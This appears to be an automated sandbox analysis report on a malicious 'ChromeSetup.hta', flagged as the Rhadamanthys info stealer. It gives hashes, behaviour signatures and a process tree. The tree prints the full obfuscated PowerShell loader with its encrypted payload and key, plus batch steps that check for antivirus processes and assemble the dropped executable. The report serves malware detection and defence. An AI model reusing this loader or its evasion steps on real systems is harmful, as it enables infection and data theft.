Analysis
-
max time kernel
1194s -
max time network
1203s -
platform
windows10-2004_x64 -
resource
win10v2004-20240319-en -
resource tags
arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ChromeSetup.hta
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
ChromeSetup.hta
Resource
win10v2004-20240319-en
Behavioral task
behavioral3
Sample
ChromeSetup.hta
Resource
win11-20240221-en
General
-
Target
ChromeSetup.hta
-
Size
140KB
-
MD5
d92c49ca712a0503de3e182f66e3dcba
-
SHA1
97f716142447128859561a75e4677f978aca7fad
-
SHA256
908ca27ec447937b2f97fd4053a8fea99f45bc7e2eb028152f2301c97f952acf
-
SHA512
fdc26a2aa4f935286f77d04538bef4e7d0a3f99fec2a85544b5ab086ba1ab0fa758332f4aea26ea5f7e57f4bdb30854d64fd760e38d2bc2b31b414a97392b4e1
-
SSDEEP
768:p+/unhi1zOzZ+/unhi1zOzpBG3uJ1zxTg+/unhi1zOzxM+/unhi1zOz:pti5OzZti5OzpB91tgti5Ozati5Oz
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Donations.pifdescription pid Process procid_target PID 5404 created 2660 5404 Donations.pif 45 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 26 1544 powershell.exe 38 1544 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exeChromeSetup.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation ChromeSetup.exe -
Executes dropped EXE 2 IoCs
Processes:
ChromeSetup.exeDonations.pifpid Process 2964 ChromeSetup.exe 5404 Donations.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 1116 5404 WerFault.exe 130 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid Process 8 tasklist.exe 5200 tasklist.exe -
Processes:
AcroRd32.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
powershell.exeDonations.pifAcroRd32.exedialer.exepid Process 1544 powershell.exe 1544 powershell.exe 1544 powershell.exe 5404 Donations.pif 5404 Donations.pif 5404 Donations.pif 5404 Donations.pif 5404 Donations.pif 5404 Donations.pif 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 5404 Donations.pif 5404 Donations.pif 1760 dialer.exe 1760 dialer.exe 1760 dialer.exe 1760 dialer.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetasklist.exetasklist.exedescription pid Process Token: SeDebugPrivilege 1544 powershell.exe Token: SeDebugPrivilege 8 tasklist.exe Token: SeDebugPrivilege 5200 tasklist.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
AcroRd32.exeDonations.pifpid Process 4520 AcroRd32.exe 5404 Donations.pif 5404 Donations.pif 5404 Donations.pif -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Donations.pifpid Process 5404 Donations.pif 5404 Donations.pif 5404 Donations.pif -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid Process 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe 4520 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mshta.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid Process procid_target PID 4436 wrote to memory of 1544 4436 mshta.exe 97 PID 4436 wrote to memory of 1544 4436 mshta.exe 97 PID 4436 wrote to memory of 1544 4436 mshta.exe 97 PID 1544 wrote to memory of 4520 1544 powershell.exe 101 PID 1544 wrote to memory of 4520 1544 powershell.exe 101 PID 1544 wrote to memory of 4520 1544 powershell.exe 101 PID 4520 wrote to memory of 220 4520 AcroRd32.exe 109 PID 4520 wrote to memory of 220 4520 AcroRd32.exe 109 PID 4520 wrote to memory of 220 4520 AcroRd32.exe 109 PID 1544 wrote to memory of 2964 1544 powershell.exe 110 PID 1544 wrote to memory of 2964 1544 powershell.exe 110 PID 1544 wrote to memory of 2964 1544 powershell.exe 110 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 2440 220 RdrCEF.exe 112 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113 PID 220 wrote to memory of 1744 220 RdrCEF.exe 113
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2660
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1760
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){return -split ($Imjw -replace '..', '0x$& ')};$eGLbfA = TLcToxJS('88713C0E6345BF6F01234702EC33828DDF2378F0EB28C8C270C3C536F77F2A54D7C551CF332C7EFBAF6008BFF77DA8394D3473142E76214843C7E2728213CE6C97DE8B20BE13ABE17961072C4BEB4AF63EE7E46FC28FAF8FBAB114708D65DA81E5E0ED6AF7D726C17278A48BEC42EC6BBE58DF4595E510DF26A125762D63550A3000230E2088A014B6E1C6C14C2820693207376F17572345B88EC7F724E177A87B0213D1AC159F23E2B4B8D62637C9C52EE0C61AF3F759CE95D4CCFDDF0A2920F9BE9528C53A00FA3E5E072D939A82148E1776937E0D3EE2417D96EB758AB281FBA019DD2FA30AC300F00A6F4948DFD2D169927C6877A7588F5C44E400419BD6307661915A781BDB5C8206A73196CDE95289A3349017F0A372F159A386104D96295F3F438637717852645E0A13E68B91D1C9DCC32199E06F03D3F18182C07AE06CFD02653A671F7F90E597264B1AB8630350388A281494A22166BCB1E37F99F9EE48E74940CA6C5664AA1C448238D37ABFE7BE981A0A4E70DC3B0DDFC66538A07BC735D13C2A030C1F254D3232CA5BD9E70858BDE03361E3A65FC4F06D462EAF5EC013F2C34DE3ECD079C2FB4A4B03C10C5C2B4EC7B6F86FC6CE2456855E39C9EE5FC9C630D415D23ADED57DD934EDA90E63224A16BF4E09F979802D9AE10954F5BD3B5578A6C00AA970D90E4785E80AEAE49317C95D54C1B08E1CC832B6F70717511068D683A1255FD896F64ABAA25551AD9668C3BF7378E17F68C6EDDBA093F48BE9FCB33545BB8E1D155B3433F5F36CEB9331DED5F64C86B2134F57C4A43C62273B2BE22CF9FFC0738F919E86116A5450C795807EE8877F1DBD799496CCF6739DACB0F81EF980F33800C6F5666CC22C574E394123A5A09FD9C660B1F295B3527FD32F61858CCB3369A181B1532D9BFD6833EB6F6D3F65D514F38472B577FB8C988FD2C8652F8F46F507A7CBA0FD6608864F30653D030DC31D049A5D0563BA61A2EFBAA8BB4825655A24C0CD4E1B9370628A4231400F6458CD6E70274AA26C4C08074C7D9A9D10DEABFF20861561FBBDA361C1140EE331F0467C225AB79BB530FADE7B415F60EA39D9C0943627996F318DF6EED8076C4C5DCB604FF6441C32A0196836C1394C79F28CD6A6EA1116FE9F0E10B6BAF9884B9D8E1AFB0162E467C4AAEE322A536D223430EADE38BC4267B3DEF3F964495B1C40A083D4E0C1F248825C62DCC7995C4870848F86637A32C271D202C5F98CC839D02847FB6857CE5A8E00DDA8B74B66E15115AD1BD6174AB6A160427FFAA1F33FF268D51253FC1C4163F0C7A2F65DC993B3DE547C7A510AF2C2A75A06398041402E9B8A7DEC77D052B922B59A7B608D95DF41CF8C3D9B25062BA3D357C54BF29264105D3F47E285C4667440C9D95C33594DA1D64F157A5C9DF920F92BF4CDABAAEC1C9E63459CDC18164C0D8E7A028941C06483663379FC6E20727DA1799FB7FEC57F45CE3DAE1DE32B38162DA998F7345141B34F6A32CA80860A6AE45D73FDDE1BFFF7A3E35966226200D6FEDB2F5F55A6D15F4E6E10A42EE2AF5EF1AB59D5156FAF3EFE1D267E3562417FB3741FEC879A432B8B25A0C804213FFB17AD28D77B52B3401862CF5D8A79B3815F08361F0690375F1444A5652755241B7B4C76E7B42BC96CBC4AC7DD4DE115175DFCBA5B484D4B254BA0A3C3A24874E3D90347F7EA8DA46AC7B123E8B9');$xBQDa = [System.Security.Cryptography.Aes]::Create();$xBQDa.Key = TLcToxJS('466371524D774563634159445A6A426E');$xBQDa.IV = New-Object byte[] 16;$PuTlXHvG = $xBQDa.CreateDecryptor();$BgiNlDJqW = $PuTlXHvG.TransformFinalBlock($eGLbfA, 0, $eGLbfA.Length);$HxMgCSafi = [System.Text.Encoding]::Utf8.GetString($BgiNlDJqW);$PuTlXHvG.Dispose();& $HxMgCSafi.Substring(0,3) $HxMgCSafi.Substring(3)2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=811494109F7FCFB1CD03F931502C8FDD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=811494109F7FCFB1CD03F931502C8FDD --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:15⤵PID:2440
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E1AF6AB8429B57EEB8434AA81C9645C2 --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1744
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E7170760948FB1C4040F29B9BC699851 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E7170760948FB1C4040F29B9BC699851 --renderer-client-id=4 --mojo-platform-channel-handle=2168 --allow-no-sandbox-job /prefetch:15⤵PID:2600
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EB81B056492B0B12BBCBECDB53C3CB34 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2636
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8DC37E1534B34FF89D3B6AAA99DD8C1C --mojo-platform-channel-handle=2708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4956
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3E15F7EC8818652FB7A0609EF276A434 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:5052
-
-
-
-
C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit4⤵PID:3120
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:5128
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5200
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:5208
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 131405⤵PID:5316
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13140\Donations.pif5⤵PID:5328
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Src + Expressions + Safari + Treasury 13140\x5⤵PID:5368
-
-
C:\Users\Admin\AppData\Local\Temp\13140\Donations.pif13140\Donations.pif 13140\x5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 9126⤵
- Program crash
PID:1116
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.15⤵
- Runs ping.exe
PID:5432
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2744
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4540 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:81⤵PID:5336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5404 -ip 54041⤵PID:1636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3712 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:81⤵PID:2628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD566d39af15a10e83a9884124905a15c09
SHA12b267df58512d6e9a886a56e90ef3c712321d5fb
SHA256a98c690305e53279d2ebf38aceee72eba4b453afb7c3c39af8e65fced8d6d6b1
SHA5129dda58c035d255e762502d2bca5141692f0e5fe1a3ad1c9a8a828ffded4f5ca86c57e1c2a42a6d5ee61c733290ffa47577b8cfedb98b5e1be8f7311e12b17189
-
Filesize
872KB
MD56ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA51257d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0
-
Filesize
870KB
MD5a91c6eadc37c8082fcd0d8fd1762b8fe
SHA173ce49f75160ed5dafb1b8483111f5d383e919c2
SHA2564b47058fa38dcae6c5f596fad0f2dcea2071b59e8d8a7b9e26a8585cf7119b69
SHA5120a5e077e0241941b8d6032dc8920a363a8bddbde52cfef940940da5d0a7244febf22824a290c75741d450ae4dd099bfcba1f20b99dcdbb1e06cfcbf4546460b8
-
Filesize
13KB
MD5b51276964bb7d7ced0ca782c1505d9ca
SHA1961d8f2ed348d6bfe38f109e97ab8b55db14591c
SHA25655cc097b9fcc03fd4c728618889b48973ed7bcf36057edd819ef475f4aca9403
SHA512fd485c564a64fdb53546c5ddee7dbd52fffea81405d81f49d3a7e1081f892f720120448ecb11190623e7e909683170ece6abaea090cdc857b62b17f1a9d2c547
-
Filesize
280KB
MD5d63c5479fd18f86817d489744a338751
